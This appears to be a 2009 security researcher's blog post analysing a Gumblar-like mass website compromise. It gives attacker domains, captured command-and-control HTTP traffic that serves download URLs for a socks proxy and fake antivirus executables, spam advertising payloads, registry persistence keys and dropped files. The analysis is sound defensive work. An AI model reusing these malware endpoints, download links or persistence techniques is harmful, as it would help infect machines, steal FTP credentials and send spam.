My RSS reader alerted me today to another wave of mass website compromises from Web Sense. Hungry for more information I decided to dig in to reveal the details that, as always, have been left out.
Summary
This attack appears to be brought to us courtesy of the attackers behind Gumblar. The malware involved and the end result are very similar. The objective of the attack is to:
Install a socks proxy
Install fake AV (System Security)
Steal FTP credentials
Send SPAM
Redirect search queries
What’s new? The attackers use updated and more stealthy code. They also introduce a component which fiddles with Terminal Services (RDP) although I’m not 100% sure why yet.
Details
Information on Websense’s site was sparse, but a quick google search for the first part of the domain they referenced in their alert yeilded the information I needed. The initial attack was coming from rnw.kz/index.php. This domain is on 91.212.65.133 which is hosted by Eurohost out of the Ukraine which I have run across many times before. I’ll probably post another article on these guys shortly.
inetnum: 91.212.65.0 - 91.212.65.255
netname: EUROHOST-NET
descr: Eurohost LLC
descr: Provider Local Registry
country: UA
This IP hosts many other domains associated with the attack:
sovi.tw
rmi.tw
orep.tw
molo.tw
dmr.tw
When connecting to rnw.kz, a series of redirects take place between the above noted domains. Cookies are created (probably so a victim is only infected once) to track victims and are passed onto the next domain. If the user has already visited the site, they are sent on to ask.com. The mighty wepawet was not sucessful in analysing the attack as it pointed me to ask.com 
After using MalZilla to quickly decode the exploit code (discussed in WebSense’s Alert), the final payload was evident and resides at: http://orep.tw/pve/pics.php?id=[unique id] [VirusTotal] [Threat Expert].
A VM of mine was infected and after loading internet explorer the malware lit up and did it’s thing. I’ve submitted a few files to VT but to be honest I haven’t had to much time to investigate to cover everything.
Binary Downloads, Ads and C&C communication
Interesting notes:
User Agent: socks
HTTP server: nginx (commonly used by attackers)
C&C appears to be: trafficshop.tw
Version: 3.15.3
Some of the attacker’s SQL is visable: UPDATE `downfiles` SET `Dcnt` = `Dcnt` + 1 WHERE `Did`=2;
GET /zub/zc.php?l=US&d=0A91D4B2BEDE419DAD002CB5AF39B158&v=3.15.3&sft=AAAAAAAAA&rvz1=41&rvz2=0002786062 HTTP/1.1
Host: trafficshop.tw
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:25:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 1822
Content-Type: text/html
#U1:http://orep.tw/socks.exe
#U1:http://orep.tw/sever.exe
#U1:http://orep.tw/ic.exe
#U;:<br>|ADVERTISING|——————————————–|<a href=”http://www.best-med-shop.com”> ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa, <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts, <br>|flawless customer support. New discounts and special offers ! <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U7:<br>|ADVERTISING|——————————————–|<a href=”http://www.best-med-shop.com”> ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa, <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts, <br>|flawless customer support. New discounts and special offers ! <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U?:<br>|ADVERTISING|——————————————–|<a href=”http://www.best-med-shop.com”> ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa, <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts, <br>|flawless customer support. New discounts and special offers ! <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U=:FORUM ADVERTISING|——————————————–||[URL=http://www.best-med-shop.com] ||Canadian medicine and pharmacy is most professional. Generic pills. High qulity and lowest price.||Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa…. [/url]|||http://www.best-med-shop.com||——————————————–%%
GET /zub/zc.php?l=US&d=0A91D4B2BEDE419DAD002CB5AF39B158&v=3.15.3&k=200704_socks.exe,432128_sever.exe,11264_ic.exe HTTP/1.1
Host: trafficshop.tw
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:26:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 251
Content-Type: text/html
#U1:http://orep.tw/socks.exe
#U1:http://orep.tw/sever.exe
#U1:http://orep.tw/ic.exe
Array
(
[0] => 200704_socks.exe
[1] => 432128_sever.exe
[2] => 11264_ic.exe
)
UPDATE `downfiles` SET `Dcnt` = `Dcnt` + 1 WHERE `Did`=2;
.crc tmpl.
GET /n1.exe HTTP/1.1
User-Agent: Mozilla
Host: miosmschat.com
HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Tue, 16 Jun 2009 23:34:57 GMT
Content-Type: application/octet-stream
Connection: close
Content-Length: 512830
Last-Modified: Tue, 16 Jun 2009 23:30:01 GMT
Accept-Ranges: bytes
Other interesting network traffic
GET /in.php?url=5&affid=02800 HTTP/1.1
Referrer: http://greatmarketingservices.com/
Accept: *//*
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows XP)
Host: greatmarketingservices.com
Connection: Keep-Alive
Cache-Control: no-cache
POST /socks/gate/r.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 125
Cache-Control: no-cache
s=0002804890612064add4936a533bbafe4f66456af0d214d0d8b7025665dbbcb84b1ff54d03fecq0d16129l0t1q1d2817l0t1q3d11521l0t1q9d7937l0t1HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:26:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 29
Content-Type: text/html
iogeelhchqhogmhgggdccnghdqdk
POST /socks/gate/data.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 78
Cache-Control: no-cache
CEF30D45FF1B48BCBBD5665207B8D0D412D0FA65466F4EFABB335A6394DDA460…ya.ru/5/982HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:26:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html
POST /socks/gate/data.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 93
Cache-Control: no-cache
CEF30D45FF1B48BCBBD5665207B8D0D412D0FA65466F4EFABB335A6394DDA460…AAAAAAAACI.050010026000300HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:26:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 50
Content-Type: text/html
Files & Reg Keys
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromoReg: “C:\WINDOWS\sever.exe”
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\18888124: “C:\Documents and Settings\All Users\Application Data\18888124\18888124.exe”
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\98898116: “C:\Documents and Settings\All Users\Application Data\98898116\98898116.exe”
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Appiytt_Dlls: “nvbms”
HKLM\SOFTWARE\Classes\CLSID\{425882B0-B0BF-11CE-B59F-00AA006CB37D}\InProcServer32\: “C:\WINDOWS\system32\npp\ndisnpp.dll”
C:\Documents and Settings\All Users\Application Data\18888124\18888124.exe (fake av)
C:\Documents and Settings\All Users\Application Data\18888124\18888124.glu (fake av)
C:\Documents and Settings\All Users\Application Data\98898116\98898116.exe (fake av)
C:\Documents and Settings\All Users\Application Data\98898116.ini (fake av)
C:\Documents and Settings\user\Local Settings\Temp\izohore.bmp (fake av)
C:\Documents and Settings\user\Local Settings\Temp\TMP46.tmpC:\WINDOWS\system32\4311z.sc
C:\WINDOWS\system32\cxilanls
C:\WINDOWS\system32\nh4g.bbv
C:\WINDOWS\system32\nvbms.dll
C:\WINDOWS\system32\sfxzmtforum.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtsmt.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtsmtspm.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtwbmail.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sgr3.ge
C:\WINDOWS\system32\SOCKET2.DLL
C:\WINDOWS\system32\SOCKET2w.DLL
C:\WINDOWS\system32\SPORDER.DLL
C:\WINDOWS\system32\user32.DLL
C:\WINDOWS\system32\vrur
C:\WINDOWS\sever.exe
C:\WINDOWS\socks.exe (socks proxy)
Other notable behavior
The malware tries to overwrite user32.dll, triggering windows file protection. My VM bluescreened a couple times during analysis which means victims are probably suffering the same problem. The malware also installs winpcap and hides it’s presence by deleting various reg keys and the winpcap uninstaller.
